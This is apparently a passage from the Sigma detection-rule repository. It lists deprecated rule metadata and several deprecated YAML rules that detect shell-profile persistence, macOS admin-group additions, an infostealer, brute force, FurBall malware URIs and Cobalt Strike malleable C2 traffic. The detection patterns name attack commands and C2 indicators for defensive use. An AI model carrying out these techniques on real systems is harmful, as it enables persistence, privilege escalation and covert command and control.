"d178a2d7-129a-4ba4-8ee6-d6e1fecd5d20", "title": "Renamed PowerShell", "date": "2019-08-22", "modified": "2023-01-18", "level": "high" }, { "id": "d4d2574f-ac17-4d9e-b986-aeeae0dc8fe2", "title": "Renamed Rundll32.exe Execution", "date": 
"2022-06-08", "modified": "2023-01-18", "level": "high" }, { "id": "e31f89f7-36fb-4697-8ab6-48823708353b", "title": "Suspicious Cmd Execution via WMI", "date": "2022-09-27", "modified": "2023-01-19", "level": "medium" }, { "id": "bf7286e7-c0be-460b-a7e8-5b2e07ecc2f2", "title": "Netcat The Powershell Version - PowerShell Module", "date": "2021-07-21", "modified": "2023-01-20", "level": "medium" }, { "id": "47688f1b-9f51-4656-b013-3cc49a166a36", "title": "Base64 Encoded Listing of Shadowcopy", "date": "2022-03-01", "modified": "2023-01-30", "level": "high" }, { "id": "5b572dcf-254b-425c-a8c5-d9af6bea35a6", "title": "Potential Xor Encoded PowerShell Command", "date": "2022-07-06", "modified": "2023-01-30", "level": "medium" }, { "id": "fd6e2919-3936-40c9-99db-0aa922c356f7", "title": "Malicious Base64 Encoded Powershell Invoke Cmdlets", "date": "2022-05-31", "modified": "2023-01-30", "level": "high" }, { "id": "eeb66bbb-3dde-4582-815a-584aee9fe6d1", "title": "Correct Execution of Nltest.exe", "date": "2021-10-04", "modified": "2023-02-02", "level": "high" }, { "id": "0acaad27-9f02-4136-a243-c357202edd74", "title": "Ryuk Ransomware Command Line Activity", "date": "2019-08-06", "modified": "2023-02-03", "level": "critical" }, { "id": "4f927692-68b5-4267-871b-073c45f4f6fe", "title": "PowerShell AMSI Bypass Pattern", "date": "2022-11-04", "modified": "2023-02-03", "level": "high" }, { "id": "038cd51c-3ad8-41c5-ba8f-5d1c92f3cc1e", "title": "Registry Dump of SAM Creds and Secrets", "date": "2022-01-05", "modified": "2023-02-04", "level": "high" }, { "id": "04f5363a-6bca-42ff-be70-0d28bf629ead", "title": "Office Applications Spawning Wmi Cli Alternate", "date": "2021-08-23", "modified": "2023-02-04", "level": "high" }, { "id": "23daeb52-e6eb-493c-8607-c4f0246cb7d8", "title": "New Lolbin Process by Office Applications", "date": "2021-08-23", "modified": "2023-02-04", "level": "high" }, { "id": "518643ba-7d9c-4fa5-9f37-baed36059f6a", "title": "WMI Execution Via Office Process", 
"date": "2021-08-23", "modified": "2023-02-04", "level": "medium" }, { "id": "77815820-246c-47b8-9741-e0def3f57308", "title": "Domain Trust Discovery", "date": "2019-10-23", "modified": "2023-02-04", "level": "medium" }, { "id": "4d6c9da1-318b-4edf-bcea-b6c93fa98fd0", "title": "Credential Acquisition via Registry Hive Dumping", "date": "2022-10-04", "modified": "2023-02-06", "level": "high" }, { "id": "6545ce61-a1bd-4119-b9be-fcbee42c0cf3", "title": "Execute MSDT.EXE Using Diagcab File", "date": "2022-06-09", "modified": "2023-02-06", "level": "high" }, { "id": "9841b233-8df8-4ad7-9133-b0b4402a9014", "title": "Sysinternals SDelete Registry Keys", "date": "2020-05-02", "modified": "2023-02-07", "level": "medium" }, { "id": "09af397b-c5eb-4811-b2bb-08b3de464ebf", "title": "WMI Reconnaissance List Remote Services", "date": "2022-01-01", "modified": "2023-02-14", "level": "medium" }, { "id": "7b0666ad-3e38-4e3d-9bab-78b06de85f7b", "title": "Renamed PaExec Execution", "date": "2019-04-17", "modified": "2023-02-14", "level": "medium" }, { "id": "bc3cc333-48b9-467a-9d1f-d44ee594ef48", "title": "SCM DLL Sideload", "date": "2022-12-01", "modified": "2023-02-14", "level": "medium" }, { "id": "e42af9df-d90b-4306-b7fb-05c863847ebd", "title": "WMI Remote Command Execution", "date": "2022-03-13", "modified": "2023-02-14", "level": "medium" }, { "id": "fa4b21c9-0057-4493-b289-2556416ae4d7", "title": "Squirrel Lolbin", "date": "2019-11-12", "modified": "2023-02-14", "level": "medium" }, { "id": "e011a729-98a6-4139-b5c4-bf6f6dd8239a", "title": "Suspicious Certutil Command Usage", "date": "2019-01-16", "modified": "2023-02-15", "level": "high" }, { "id": "034affe8-6170-11ec-844f-0f78aa0c4d66", "title": "Mimikatz MemSSP Default Log File Creation", "date": "2021-12-20", "modified": "2023-02-16", "level": "critical" }, { "id": "7fe71fc9-de3b-432a-8d57-8c809efc10ab", "title": "New Service Creation", "date": "2019-10-21", "modified": "2023-02-20", "level": "low" }, { "id": 
"056a7ee1-4853-4e67-86a0-3fd9ceed7555", "title": "Invoke-Obfuscation RUNDLL LAUNCHER", "date": "2020-10-18", "modified": "2023-02-21", "level": "medium" }, { "id": "3ede524d-21cc-472d-a3ce-d21b568d8db7", "title": "PsExec Service Start", "date": "2018-03-13", "modified": "2023-02-28", "level": "low" }, { "id": "80167ada-7a12-41ed-b8e9-aa47195c66a1", "title": "Run Whoami as SYSTEM", "date": "2019-10-23", "modified": "2023-02-28", "level": "high" }, { "id": "fa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba", "title": "PsExec Tool Execution", "date": "2017-06-12", "modified": "2023-02-28", "level": "low" }, { "id": "2c0d2d7b-30d6-4d14-9751-7b9113042ab9", "title": "Suspicious Characters in CommandLine", "date": "2022-04-27", "modified": "2023-03-03", "level": "high" }, { "id": "6783aa9e-0dc3-49d4-a94a-8b39c5fd700b", "title": "Stop Or Remove Antivirus Service", "date": "2021-07-07", "modified": "2023-03-04", "level": "high" }, { "id": "7fd4bb39-12d0-45ab-bb36-cebabc73dc7b", "title": "Suspicious Execution of Sc to Delete AV Services", "date": "2022-08-01", "modified": "2023-03-04", "level": "high" }, { "id": "a7a7e0e5-1d57-49df-9c58-9fe5bc0346a2", "title": "Renamed PsExec", "date": "2019-05-21", "modified": "2023-03-04", "level": "high" }, { "id": "1a70042a-6622-4a2b-8958-267625349abf", "title": "Run from a Zip File", "date": "2021-12-26", "modified": "2023-03-05", "level": "medium" }, { "id": "46591fae-7a4c-46ea-aec3-dff5e6d785dc", "title": "Root Certificate Installed", "date": "2020-10-10", "modified": "2023-03-05", "level": "medium" }, { "id": "eb87818d-db5d-49cc-a987-d5da331fbd90", "title": "Stop Windows Service", "date": "2019-10-23", "modified": "2023-03-05", "level": "low" }, { "id": "23250293-eed5-4c39-b57a-841c8933a57d", "title": "Visual Basic Script Execution", "date": "2022-01-02", "modified": "2023-03-06", "level": "medium" }, { "id": "344482e4-a477-436c-aa70-7536d18a48c7", "title": "Execution via MSSQL Xp_cmdshell Stored Procedure", "date": "2022-09-28", "modified": 
"2023-03-06", "level": "high" }, { "id": "00a4bacd-6db4-46d5-9258-a7d5ebff4003", "title": "Read and Execute a File Via Cmd.exe", "date": "2022-08-20", "modified": "2023-03-07", "level": "medium" }, { "id": "70e68156-6571-427b-a6e9-4476a173a9b6", "title": "Cmd Stream Redirection", "date": "2022-02-04", "modified": "2023-03-07", "level": "medium" }, { "id": "033fe7d6-66d1-4240-ac6b-28908009c71f", "title": "APT29", "date": "2018-12-04", "modified": "2023-03-08", "level": "high" }, { "id": "04d9079e-3905-4b70-ad37-6bdf11304965", "title": "CrackMapExecWin", "date": "2018-04-08", "modified": "2023-03-08", "level": "critical" }, { "id": "18739897-21b1-41da-8ee4-5b786915a676", "title": "GALLIUM Artefacts", "date": "2020-02-07", "modified": "2023-03-09", "level": "high" }, { "id": "0eb2107b-a596-422e-b123-b389d5594ed7", "title": "Hurricane Panda Activity", "date": "2019-03-04", "modified": "2023-03-10", "level": "high" }, { "id": "4a12fa47-c735-4032-a214-6fab5b120670", "title": "Lazarus Activity Apr21", "date": "2021-04-20", "modified": "2023-03-10", "level": "high" }, { "id": "7454df60-1478-484b-810d-bff5d0ba6d4b", "title": "DNS Tunnel Technique from MuddyWater", "date": "2020-06-04", "modified": "2023-03-10", "level": "critical" }, { "id": "7b49c990-4a9a-4e65-ba95-47c9cc448f6e", "title": "Lazarus Loaders", "date": "2020-12-23", "modified": "2023-03-10", "level": "critical" }, { "id": "43f487f0-755f-4c2a-bce7-d6d2eec2fcf8", "title": "Suspicious Add Scheduled Task From User AppData Temp", "date": "2021-11-03", "modified": "2023-03-14", "level": "high" }, { "id": "d813d662-785b-42ca-8b4a-f7457d78d5a9", "title": "Suspicious Load of Advapi31.dll", "date": "2022-02-03", "modified": "2023-03-15", "level": "informational" }, { "id": "e74e15cc-c4b6-4c80-b7eb-dfe49feb7fe9", "title": "Edit of .bash_profile and .bashrc", "date": "2019-05-12", "modified": "2023-03-23", "level": "medium" }, { "id": "ba2a7c80-027b-460f-92e2-57d113897dbc", "title": "App Permissions Granted For Other 
APIs", "date": "2022-07-28", "modified": "2023-03-29", "level": "medium" }, { "id": "18cf6cf0-39b0-4c22-9593-e244bdc9a2d4", "title": "TA505 Dropper Load Pattern", "date": "2020-12-08", "modified": "2023-04-05", "level": "critical" }, { "id": "2d117e49-e626-4c7c-bd1f-c3c0147774c8", "title": "Potential PowerShell Base64 Encoded Shellcode", "date": "2018-11-17", "modified": "2023-04-06", "level": "medium" }, { "id": "635dbb88-67b3-4b41-9ea5-a3af2dd88153", "title": "Microsoft Binary Github Communication", "date": "2017-08-24", "modified": "2023-04-18", "level": "high" }, { "id": "6c939dfa-c710-4e12-a4dd-47e1f10e68e1", "title": "Domestic Kitten FurBall Malware Pattern", "date": "2021-02-08", "modified": "2023-04-20", "level": "high" }, { "id": "6355a919-2e97-4285-a673-74645566340d", "title": "Process Memory Dumped Via RdrLeakDiag.EXE", "date": "2022-01-04", "modified": "2023-04-24", "level": "high" }, { "id": "9cf01b6c-e723-4841-a868-6d7f8245ca6e", "title": "Group Modification Logging", "date": "2019-03-26", "modified": "2023-04-26", "level": "low" }, { "id": "410ad193-a728-4107-bc79-4419789fcbf8", "title": "Trickbot Malware Reconnaissance Activity", "date": "2019-12-28", "modified": "2023-04-28", "level": "high" }, { "id": "fce5f582-cc00-41e1-941a-c6fabf0fdb8c", "title": "Suspicious PowerShell Invocations - Specific", "date": "2017-03-05", "modified": "2023-05-04", "level": "high" }, { "id": "f016c716-754a-467f-a39e-63c06f773987", "title": "Suspicious Remote Thread Target", "date": "2022-08-25", "modified": "2023-05-05", "level": "medium" }, { "id": "65d2be45-8600-4042-b4c0-577a1ff8a60e", "title": "Application Whitelisting Bypass via DLL Loaded by odbcconf.exe", "date": "2019-10-25", "modified": "2023-05-22", "level": "medium" }, { "id": "8e2b24c9-4add-46a0-b4bb-0057b4e6187d", "title": "Regsvr32 Anomaly", "date": "2019-01-16", "modified": "2023-05-26", "level": "high" }, { "id": "fe6e002f-f244-4278-9263-20e4b593827f", "title": "Alternate PowerShell Hosts - Image", 
"date": "2019-09-12", "modified": "2023-06-01", "level": "low" }, { "id": "9e77ed63-2ecf-4c7b-b09d-640834882028", "title": "PsExec Pipes Artifacts", "date": "2020-05-10", "modified": "2023-08-07", "level": "medium" }, { "id": "39776c99-1c7b-4ba0-b5aa-641525eee1a4", "title": "Execution via CL_Mutexverifiers.ps1", "date": "2020-10-14", "modified": "2023-08-17", "level": "high" }, { "id": "4cd29327-685a-460e-9dac-c3ab96e549dc", "title": "Execution via CL_Invocation.ps1 - Powershell", "date": "2020-10-14", "modified": "2023-08-17", "level": "high" }, { "id": "4e8d5fd3-c959-441f-a941-f73d0cdcdca5", "title": "Abusing Windows Telemetry For Persistence - Registry", "date": "2020-09-29", "modified": "2023-08-17", "level": "high" }, { "id": "7c637634-c95d-4bbf-b26c-a82510874b34", "title": "Disable Microsoft Office Security Features", "date": "2021-06-08", "modified": "2023-08-17", "level": "high" }, { "id": "8a58209c-7ae6-4027-afb0-307a78e4589a", "title": "User Account Hidden By Registry", "date": "2022-08-20", "modified": "2023-08-17", "level": "high" }, { "id": "9b894e57-033f-46cf-b7fa-a52804181973", "title": "Office Security Settings Changed", "date": "2020-05-22", "modified": "2023-08-17", "level": "high" }, { "id": "c81fe886-cac0-4913-a511-2822d72ff505", "title": "SilentProcessExit Monitor Registration", "date": "2021-02-26", "modified": "2023-08-17", "level": "high" }, { "id": "0c1ffcf9-efa9-436e-ab68-23a9496ebf5b", "title": "User Added To Admin Group - MacOS", "date": "2023-03-19", "modified": "2023-08-22", "level": "medium" }, { "id": "5b80cf53-3a46-4adc-960b-05ec19348d74", "title": "Wscript Execution from Non C Drive", "date": "2022-10-01", "modified": "2023-08-29", "level": "medium" }, { "id": "5e3d3601-0662-4af0-b1d2-36a05e90c40a", "title": "LSASS Memory Dump File Creation", "date": "2019-10-22", "modified": "2023-08-29", "level": "high" }, { "id": "839f1ee1-292d-495a-bf37-818267b8ee82", "title": "Vulnerable Driver Load By Name", "date": "2022-10-03", "modified": 
"2023-09-03", "level": "low" }, { "id": "21b23707-60d6-41bb-96e3-0f0481b0fed9", "title": "Vulnerable Dell BIOS Update Driver Load", "date": "2021-05-05", "modified": "2023-09-12", "level": "high" }, { "id": "7bcfeece-e5ed-4ff3-a5fb-2640d8cc8647", "title": "Vulnerable GIGABYTE Driver Load", "date": "2022-07-25", "modified": "2023-09-12", "level": "high" }, { "id": "7c676970-af4f-43c8-80af-ec9b49952852", "title": "Vulnerable AVAST Anti Rootkit Driver Load", "date": "2022-07-28", "modified": "2023-09-12", "level": "high" }, { "id": "9bacc538-d1b9-4d42-862e-469eafc05a41", "title": "Vulnerable HW Driver Load", "date": "2022-07-26", "modified": "2023-09-12", "level": "high" }, { "id": "ac683a42-877b-4ff8-91ac-69e94b0f70b4", "title": "Vulnerable Lenovo Driver Load", "date": "2022-11-10", "modified": "2023-09-12", "level": "high" }, { "id": "91bc09e7-674d-4cf5-8d86-ed5d8bdb95a6", "title": "Usage Of Malicious POORTRY Signed Driver", "date": "2022-12-16", "modified": "2023-09-13", "level": "high" }, { "id": "d7825193-b70a-48a4-b992-8b5b3015cc11", "title": "Windows Update Client LOLBIN", "date": "2020-10-17", "modified": "2023-11-11", "level": "high" }, { "id": "ca83e9f3-657a-45d0-88d6-c1ac280caf53", "title": "New Service Uses Double Ampersand in Path", "date": "2022-07-05", "modified": "2023-11-15", "level": "high" }, { "id": "fe34868f-6e0e-4882-81f6-c43aa8f15b62", "title": "Windows Defender Threat Detection Disabled", "date": "2020-07-28", "modified": "2023-11-22", "level": "high" }, { "id": "32d0d3e2-e58d-4d41-926b-18b520b2b32d", "title": "Credential Dumping Tools Accessing LSASS Memory", "date": "2017-02-16", "modified": "2023-11-30", "level": "high" }, { "id": "a122ac13-daf8-4175-83a2-72c387be339d", "title": "Security Event Log Cleared", "date": "2021-08-15", "modified": "2023-12-06", "level": "medium" }, { "id": "0332a266-b584-47b4-933d-a00b103e1b37", "title": "Suspicious Get-WmiObject", "date": "2022-01-12", "modified": "2023-12-11", "level": "low" }, { "id": 
"46deb5e1-28c9-4905-b2df-51cdcc9e6073", "title": "PowerShell Scripts Run by a Services", "date": "2020-10-06", "modified": "2023-12-11", "level": "high" }, { "id": "d23f2ba5-9da0-4463-8908-8ee47f614bb9", "title": "Powershell File and Directory Discovery", "date": "2021-12-15", "modified": "2023-12-11", "level": "low" }, { "id": "df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2", "title": "Credential Dumping Tools Service Execution", "date": "2017-03-05", "modified": "2023-12-11", "level": "critical" }, { "id": "602a1f13-c640-4d73-b053-be9a2fa58b77", "title": "Svchost DLL Search Order Hijack", "date": "2019-10-28", "modified": "2024-01-10", "level": "high" }, { "id": "839dd1e8-eda8-4834-8145-01beeee33acd", "title": "SAM Dump to AppData", "date": "2018-01-27", "modified": "2024-01-18", "level": "high" }, { "id": "e32ce4f5-46c6-4c47-ba69-5de3c9193cd7", "title": "Possible Process Hollowing Image Loading", "date": "2018-01-07", "modified": "2024-01-22", "level": "high" }, { "id": "a6d67db4-6220-436d-8afc-f3842fe05d43", "title": "Dnscat Execution", "date": "2019-10-24", "modified": "2024-01-25", "level": "critical" }, { "id": "d7b09985-95a3-44be-8450-b6eadf49833e", "title": "Suspicious Non-Browser Network Communication With Reddit API", "date": "2023-02-16", "modified": "2024-02-02", "level": "medium" }, { "id": "37325383-740a-403d-b1a2-b2b4ab7992e7", "title": "CobaltStrike Malleable (OCSP) Profile", "date": "2019-11-12", "modified": "2024-02-15", "level": "high" }, { "id": "41b42a36-f62c-4c34-bd40-8cb804a34ad8", "title": "CobaltStrike Malformed UAs in Malleable Profiles", "date": "2021-05-06", "modified": "2024-02-15", "level": "critical" }, { "id": "953b895e-5cc9-454b-b183-7f3db555452e", "title": "CobaltStrike Malleable Amazon Browsing Traffic Profile", "date": "2019-11-12", "modified": "2024-02-15", "level": "high" }, { "id": "c9b33401-cc6a-4cf6-83bb-57ddcb2407fc", "title": "CobaltStrike Malleable OneDrive Browsing Traffic Profile", "date": "2019-11-12", "modified": "2024-02-15", 
"level": "high" }, { "id": "73fcad2e-ff14-4c38-b11d-4172c8ac86c7", "title": "Suspicious Rundll32 Script in CommandLine", "date": "2021-12-04", "modified": "2024-02-23", "level": "medium" }, { "id": "9f06447a-a33a-4cbe-a94f-a3f43184a7a3", "title": "Rundll32 JS RunHTMLApplication Pattern", "date": "2022-01-14", "modified": "2024-02-23", "level": "high" }, { "id": "e06ac91d-b9e6-443d-8e5b-af749e7aa6b6", "title": "iOS Implant URL Pattern", "date": "2019-08-30", "modified": "2024-02-26", "level": "critical" }, { "id": "628d7a0b-7b84-4466-8552-e6138bc03b43", "title": "Suspicious Epmap Connection", "date": "2022-07-14", "modified": "2024-03-01", "level": "high" }, { "id": "9433ff9c-5d3f-4269-99f8-95fc826ea489", "title": "CrackMapExec File Creation Patterns", "date": "2022-03-12", "modified": "2024-03-01", "level": "high" }, { "id": "c625c4c2-515d-407f-8bb6-456f65955669", "title": "Service Binary in Uncommon Folder", "date": "2022-05-02", "modified": "2024-03-25", "level": "medium" }, { "id": "42f0e038-767e-4b85-9d96-2c6335bad0b5", "title": "Adwind RAT / JRAT - Registry", "date": "2017-11-10", "modified": "2024-03-26", "level": "high" }, { "id": "5039f3d2-406a-4c1a-9350-7a5a85dc84c2", "title": "Search-ms and WebDAV Suspicious Indicators in URL", "date": "2023-08-21", "modified": "2024-05-10", "level": "high" }, { "id": "b916cba1-b38a-42da-9223-17114d846fd6", "title": "Potential NT API Stub Patching", "date": "2023-01-07", "modified": "2024-05-27", "level": "medium" }, { "id": "3d968d17-ffa4-4bc0-bfdc-f139de76ce77", "title": "Potential Persistence Via COM Hijacking From Suspicious Locations", "date": "2022-07-28", "modified": "2024-07-16", "level": "high" }, { "id": "1a3d42dd-3763-46b9-8025-b5f17f340dfb", "title": "Suspicious Unattend.xml File Access", "date": "2021-12-19", "modified": "2024-07-22", "level": "medium" }, { "id": "6902955a-01b7-432c-b32a-6f5f81d8f624", "title": "Suspicious File Event With Teams Objects", "date": "2022-09-16", "modified": "2024-07-22", 
"level": "high" }, { "id": "a0ff33d8-79e4-4cef-b4f3-9dc4133ccd12", "title": "Potential Persistence Via COM Search Order Hijacking", "date": "2020-04-14", "modified": "2024-09-02", "level": "medium" }, { "id": "a33f8808-2812-4373-ae95-8cfb82134978", "title": "Windows Defender Exclusion Deleted", "date": "2019-10-26", "modified": "2025-01-30", "level": "medium" }, { "id": "e17121b4-ef2a-4418-8a59-12fb1631fa9e", "title": "Delete Volume Shadow Copies via WMI with PowerShell - PS Script", "date": "2021-12-26", "modified": "2025-05-20", "level": "high" }, { "id": "6e897651-f157-4d8f-aaeb-df8151488385", "title": "PowerShell Web Download", "date": "2022-03-24", "modified": "2025-07-18", "level": "medium" }, { "id": "f748c45a-f8d3-4e6f-b617-fe176f695b8f", "title": ".RDP File Created by Outlook Process", "date": "2024-11-01", "modified": "2025-07-22", "level": "high" }, { "id": "a2a3b925-7bb0-433b-b508-db9003263cc4", "title": "Active Directory Parsing DLL Loaded Via Office Application", "date": "2020-02-19", "modified": "2025-10-17", "level": "medium" }, { "id": "cdeef967-f9a1-4375-90ee-6978c5f23974", "title": "Azure Application Credential Modified", "date": "2021-09-02", "modified": "2025-10-17", "level": "medium" }, { "id": "8f70ac5f-1f6f-4f8e-b454-db19561216c5", "title": "PowerShell DownloadFile", "date": "2020-08-28", "modified": "2025-10-20", "level": "high" }, { "id": "e28a5a99-da44-436d-b7a0-2afc20a5f413", "title": "Whoami Utility Execution", "date": "2018-08-13", "modified": "2025-10-20", "level": "low" }, { "id": "7417e29e-c2e7-4cf6-a2e8-767228c64837", "title": "Active Directory Kerberos DLL Loaded Via Office Application", "date": "2020-02-19", "modified": "2025-10-22", "level": "medium" }, { "id": "879c3015-c88b-4782-93d7-07adf92dbcb7", "title": "Space After Filename", "date": "2020-06-17", "modified": "2025-11-22", "level": "low" }, { "id": "e710a880-1f18-4417-b6a0-b5afdf7e305a", "title": "Atomic MacOS Stealer - FileGrabber Infostealer Execution", "date": 
"2025-09-12", "modified": "2025-11-22", "level": "high" }, { "id": "4be03877-d5b6-4520-85c9-a5911c0a656c", "title": "FileFix - Suspicious Child Process from Browser File Upload Abuse", "date": "2025-06-26", "modified": "2025-11-24", "level": "high" }, { "id": "6e30c82f-a9f8-4aab-b79c-7c12bce6f248", "title": "File Download Via Bitsadmin To An Uncommon Target Folder", "date": "2022-06-28", "modified": "2025-12-10", "level": "medium" } ] ================================================ FILE: deprecated/linux/lnx_auditd_alter_bash_profile.yml ================================================ title: Edit of .bash_profile and .bashrc id: e74e15cc-c4b6-4c80-b7eb-dfe49feb7fe9 status: deprecated description: Detects change of user environment. Adversaries can insert code into these files to gain persistence each time a user logs in or opens a new shell. references: - 'MITRE Attack technique T1156; .bash_profile and .bashrc. ' author: Peter Matkovski date: 2019/05/12 modified: 2023/03/23 tags: - attack.s0003 - attack.persistence - attack.t1546.004 logsource: product: linux service: auditd detection: selection: type: 'PATH' name: - '/root/.bashrc' - '/root/.bash_profile' - '/root/.profile' - '/home/*/.bashrc' - '/home/*/.bash_profile' - '/home/*/.profile' - '/etc/profile' - '/etc/shells' - '/etc/bashrc' - '/etc/csh.cshrc' - '/etc/csh.login' condition: selection falsepositives: - Admin or User activity level: medium ================================================ FILE: deprecated/linux/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml ================================================ title: OMIGOD SCX RunAsProvider ExecuteShellCommand - Auditd id: 045b5f9c-49f7-4419-a236-9854fb3c827a status: unsupported # This rule requires correlations. 
See https://github.com/SigmaHQ/sigma/discussions/4440#discussioncomment-7070862 and https://user-images.githubusercontent.com/9653181/133756156-4fb9c2b1-aa65-4380-957b-72170de36fc4.png description: | Detects the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite. references: - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure - https://github.com/Azure/Azure-Sentinel/pull/3059 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) date: 2021-09-17 modified: 2024-09-02 tags: - attack.privilege-escalation - attack.initial-access - attack.execution - attack.t1068 - attack.t1190 - attack.t1203 logsource: product: linux service: auditd detection: selection: type: 'SYSCALL' syscall: 'execve' uid: 0 cwd: '/var/opt/microsoft/scx/tmp' comm: 'sh' condition: selection falsepositives: - Legitimate use of SCX RunAsProvider Invoke_ExecuteShellCommand. 
level: high ================================================ FILE: deprecated/linux/lnx_space_after_filename_.yml ================================================ title: Space After Filename id: 879c3015-c88b-4782-93d7-07adf92dbcb7 status: deprecated description: Detects space after filename author: Ömer Günal date: 2020-06-17 modified: 2025-11-22 tags: - attack.execution - attack.t1059 logsource: product: linux detection: selection1: - 'echo "*" > * && chmod +x *' selection2: - 'mv * "* "' condition: all of selection* falsepositives: - Typos level: low ================================================ FILE: deprecated/macos/proc_creation_macos_add_to_admin_group.yml ================================================ title: User Added To Admin Group - MacOS id: 0c1ffcf9-efa9-436e-ab68-23a9496ebf5b status: deprecated description: Detects attempts to create and/or add an account to the admin group, thus granting admin privileges. references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-3---create-local-account-with-admin-privileges-using-sysadminctl-utility---macos - https://ss64.com/osx/dscl.html - https://ss64.com/osx/sysadminctl.html author: Sohan G (D4rkCiph3r) date: 2023/03/19 modified: 2023/08/22 tags: - attack.t1078.003 - attack.initial_access - attack.privilege_escalation logsource: category: process_creation product: macos detection: selection_sysadminctl: #creates and adds new user to admin group Image|endswith: '/sysadminctl' CommandLine|contains|all: - ' -addUser ' - ' -admin ' selection_dscl: #adds to admin group Image|endswith: '/dscl' CommandLine|contains|all: - ' -append ' - ' /Groups/admin ' - ' GroupMembership ' condition: 1 of selection_* falsepositives: - Legitimate administration activities level: medium ================================================ FILE: deprecated/macos/proc_creation_macos_malware_amos_filegrabber_exec.yml ================================================ title: Atomic 
MacOS Stealer - FileGrabber Infostealer Execution id: e710a880-1f18-4417-b6a0-b5afdf7e305a status: deprecated description: | Detects the execution of FileGrabber on macOS, which is associated with Amos infostealer campaigns targeting sensitive user files. references: - https://www.trendmicro.com/en_us/research/25/i/an-mdr-analysis-of-the-amos-stealer-campaign.html - https://www.jamf.com/blog/infostealers-pose-threat-to-macos/ author: Jason Phang Vern - Onn (Gen Digital) date: 2025-09-12 modified: 2025-11-22 tags: - attack.execution - attack.t1059.002 - detection.emerging-threats logsource: category: process_creation product: macos detection: selection: CommandLine|contains|all: - 'FileGrabber' - '/tmp' condition: selection falsepositives: - Unknown level: high ================================================ FILE: deprecated/other/generic_brute_force.yml ================================================ title: Brute Force id: 53c7cca0-2901-493a-95db-d00d6fcf0a37 status: deprecated description: Detects many authentication failures from one source to one destination, which may indicate brute-force activity author: Aleksandr Akhremchik, oscd.community date: 2019/10/25 modified: 2022/11/04 logsource: category: authentication detection: selection: action: failure timeframe: 600s condition: selection | count(category) by dst_ip > 30 fields: - src_ip - dst_ip - user falsepositives: - Inventory scanning - Vulnerability scanner - Legitimate application level: medium tags: - attack.credential_access - attack.t1110 ================================================ FILE: deprecated/web/proxy_apt_domestic_kitten.yml ================================================ title: Domestic Kitten FurBall Malware Pattern id: 6c939dfa-c710-4e12-a4dd-47e1f10e68e1 status: deprecated description: Detects specific malware patterns used by FurBall malware linked to the Iranian Domestic Kitten APT group references: - 
https://research.checkpoint.com/2021/domestic-kitten-an-inside-look-at-the-iranian-surveillance-operations/ author: Florian Roth (Nextron Systems) date: 2021/02/08 modified: 2023/04/20 tags: - attack.command_and_control logsource: category: proxy detection: selection: c-uri|contains: - 'Get~~~AllBrowser' - 'Get~~~HardwareInfo' - 'Take~~RecordCall' - 'Reset~~~AllCommand' condition: selection fields: - c-ip - c-uri falsepositives: - Unlikely level: high ================================================ FILE: deprecated/web/proxy_cobalt_amazon.yml ================================================ title: CobaltStrike Malleable Amazon Browsing Traffic Profile id: 953b895e-5cc9-454b-b183-7f3db555452e status: deprecated description: Detects Malleable Amazon Profile references: - https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/amazon.profile - https://www.hybrid-analysis.com/sample/ee5eca8648e45e2fea9dac0d920ef1a1792d8690c41ee7f20343de1927cc88b9?environmentId=100 author: Markus Neis date: 2019/11/12 modified: 2024/02/15 tags: - attack.defense_evasion - attack.command_and_control - attack.t1071.001 logsource: category: proxy detection: selection_1: c-useragent: 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko' cs-method: 'GET' c-uri: '/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books' cs-host: 'www.amazon.com' cs-cookie|endswith: '=csm-hit=s-24KU11BB82RZSYGJ3BDK|1419899012996' selection_2: c-useragent: 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko' cs-method: 'POST' c-uri: '/N4215/adj/amzn.us.sr.aps' cs-host: 'www.amazon.com' condition: 1 of selection_* falsepositives: - Unknown level: high ================================================ FILE: deprecated/web/proxy_cobalt_malformed_uas.yml ================================================ title: CobaltStrike Malformed UAs in Malleable Profiles id: 41b42a36-f62c-4c34-bd40-8cb804a34ad8 status: deprecated description: 
Detects different malformed user agents used in Malleable Profiles used with Cobalt Strike references: - https://github.com/yeyintminthuhtut/Malleable-C2-Profiles-Collection/ author: Florian Roth (Nextron Systems) date: 2021/05/06 modified: 2024/02/15 tags: - attack.defense_evasion - attack.command_and_control - attack.t1071.001 logsource: category: proxy detection: selection1: c-useragent: - 'Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1)' - 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E )' - 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2) Java/1.5.0_08' selection2: c-useragent|endswith: '; MANM; MANM)' condition: 1 of selection* falsepositives: - Unknown level: critical ================================================ FILE: deprecated/web/proxy_cobalt_ocsp.yml ================================================ title: CobaltStrike Malleable (OCSP) Profile id: 37325383-740a-403d-b1a2-b2b4ab7992e7 status: deprecated description: Detects Malleable (OCSP) Profile with Typo (OSCP) in URL references: - https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/ocsp.profile author: Markus Neis date: 2019/11/12 modified: 2024/02/15 tags: - attack.defense_evasion - attack.command_and_control - attack.t1071.001 logsource: category: proxy detection: selection: c-uri|contains: '/oscp/' cs-host: 'ocsp.verisign.com' condition: selection falsepositives: - Unknown level: high ================================================ FILE: deprecated/web/proxy_cobalt_onedrive.yml ================================================ title: CobaltStrike Malleable OneDrive Browsing Traffic Profile id: c9b33401-cc6a-4cf6-83bb-57ddcb2407fc status: deprecated description: Detects Malleable OneDrive Profile references: - 